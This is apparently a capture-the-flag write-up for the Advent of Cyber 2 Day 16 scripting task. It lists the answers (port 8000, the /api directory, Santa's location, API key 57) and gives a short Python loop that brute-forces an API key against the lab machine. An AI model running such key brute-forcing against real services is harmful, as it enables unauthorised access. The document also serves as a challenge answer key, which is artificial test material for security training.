Advent Of CyberSecurity 2
Task 21 : [Day 16] Scripting Help! Where is Santa?
Let us start with a nmap scan
What is the port number for the web server?
8000
Without using enumerations tools such as Dirbuster, what is the directory for the API? (without the API key)
/api
looking at the source code of the index.html page we can find the api directory
Where is Santa right now?
Winter Wonderland, Hyde Park, London.
We can bruteforce for the correct api key
import requests
for x in range(1,100,2):
url = "http://<ip>:8000/api/"+str(x)
response = requests.get(url)
print(x,": ",response.text )
Find out the correct API key.
57